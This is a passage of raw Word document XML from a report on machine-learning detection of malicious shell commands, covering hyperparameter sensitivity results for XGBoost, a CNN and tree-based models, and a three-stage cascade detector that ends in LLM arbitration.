              <w:t xml:space="preserve"> before fitting, so the model's notion of "normal" is defined by benign traffic alone and no attack label leaks in. This is what earns the model its place in the portfolio (§6.5).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>random_state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reproducibility.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The through-line for both models mirrors the one Ben reports for XGBoost and the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>CNN: **the representation sets the accuracy and a single purpose-built dial sets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the false-alarm rate.** Random Forest's F1 barely moves across its whole grid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>because 43 engineered features, not tree capacity, are the ceiling; its depth cap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>buys false-alarm reduction rather than accuracy. The Isolation Forest's dial does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">not touch the model at all — it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the operating point. Both are consequently</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cheap to run and hard to misconfigure catastrophically, subject to the two rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 7 establishes: cap Random Forest depth rather than growing full trees,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and never let the Isolation Forest's stage-1 threshold be chosen by F1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 7 — Hyperparameter Sensitivity Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>This chapter reports one-at-a-time (OAT) sensitivity sweeps for the two</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>production candidate models — the gradient-boosted tree ensemble (XGBoost) and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the character/token CNN — on the binary attack/benign command-line task</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(MITRE ATT&amp;CK T1059.004, 1:3 attack:benign). Each sweep fixes every</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>hyperparameter at its default and varies a single one across a small grid,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">recording the resulting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>false-positive rate (FPR)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the held-out</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>test split (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_test = 3049</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Every tuple below is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(value, F1, FPR)</w:t>
      </w:r>
      <w:r>
        <w:t>. The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">paired figures </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch7_sensitivity_xgboost.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch7_sensitivity_cnn.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>plot these curves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Scope caveat.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> Both sweeps were run on a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>5000-row training subsample</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_train = 5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">) to keep the OAT grid affordable. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rankings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>qualitative shapes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> reported here are the intended takeaway; absolute F1/FPR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>magnitudes — and especially the settings that flirt with overfitting (deep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>trees, low dropout, aggressive learning rates) — should be re-confirmed on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>full training corpus before being locked in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Pipeline architecture (Figure 7.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The hyperparameters tuned in this chapter feed the 3-stage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cascade detector</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Ch. 8.4): raw commands enter a cheap Isolation-Forest bulk filter, survivors go to the tuned XGBoost-hybrid, and only genuine edge cases reach the LLM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>flowchart TD</w:t>
        <w:br/>
        <w:t xml:space="preserve">    IN(["Raw shell command string"]) --&gt; S1["Stage 1 · Isolation Forest&lt;br/&gt;(unsupervised anomaly score)"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    S1 --&gt; D1{"score below&lt;br/&gt;calibrated threshold?"}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D1 --&gt;|"yes"| B1(["BENIGN — cleared&lt;br/&gt;(bulk benign filter)"])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D1 --&gt;|"no (anomalous)"| S2["Stage 2 · XGBoost-hybrid&lt;br/&gt;P(attack)"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    S2 --&gt; D2{"P(attack)?"}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D2 --&gt;|"0.65 – 1.00"| A1(["ATTACK&lt;br/&gt;(high confidence)"])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D2 --&gt;|"0.00 – 0.35"| B2(["BENIGN&lt;br/&gt;(high confidence)"])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D2 --&gt;|"0.35 – 0.65&lt;br/&gt;(edge case)"| S3["Stage 3 · LLM arbitration&lt;br/&gt;(Llama 3.1-8B)"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    S3 --&gt; D3{"final verdict"}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D3 --&gt;|"malicious"| A2(["ATTACK"])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D3 --&gt;|"benign"| B3(["BENIGN"])</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    classDef attack fill:#f8d7da,stroke:#c0392b,color:#000</w:t>
        <w:br/>
        <w:t xml:space="preserve">    classDef benign fill:#d4edda,stroke:#27ae60,color:#000</w:t>
        <w:br/>
        <w:t xml:space="preserve">    classDef stage fill:#e7f0fb,stroke:#2a6fb0,color:#000</w:t>
        <w:br/>
        <w:t xml:space="preserve">    class A1,A2 attack</w:t>
        <w:br/>
        <w:t xml:space="preserve">    class B1,B2,B3 benign</w:t>
        <w:br/>
        <w:t xml:space="preserve">    class S1,S2,S3 stage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Figure 7.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Three-stage cascade detector. Stage 1 (Isolation Forest) clears bulk benign traffic below an anomaly threshold auto-calibrated to retain 99% of attacks; stage 2 (XGBoost-hybrid) settles the high-confidence bands — P(attack) &gt; 0.65 → attack, &lt; 0.35 → benign; only the 0.35–0.65 edge band reaches stage 3 (LLM arbitration, Llama 3.1-8B). Standalone source: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch7_pipeline_diagram.md</w:t>
      </w:r>
      <w:r>
        <w:t>](ch7_pipeline_diagram.md).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Headline answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Biggest impact on F1: `learning_rate`.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It is the single most influential</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">knob in the study. On the CNN it moves F1 from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.7127 → 0.8512</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (a swing of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.1385</w:t>
      </w:r>
      <w:r>
        <w:t>) across the swept range; on XGBoost it also produces the largest F1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>swing of any tree hyperparameter (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.6848 → 0.7329</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, i.e. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.0481</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Biggest impact on FPR: `scale_pos_weight` (XGBoost).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It drives FPR from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.049 at 1.0 → 0.1447 at 5.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>~3×</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> change — while barely touching F1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>It is, by design, a recall/false-alarm dial rather than an accuracy dial.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The rest of the chapter substantiates and interprets these two claims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>XGBoost — F1 is saturated; false alarms are governed by `scale_pos_weight`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Defaults:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_depth=6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators=200</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>learning_rate=0.1</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scale_pos_weight=3.0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>`max_depth`</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7082</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1334</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7329</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0993</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7332</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0861</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7354</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0796</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>`n_estimators`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50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7083</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1325</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7265</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1137</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7329</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
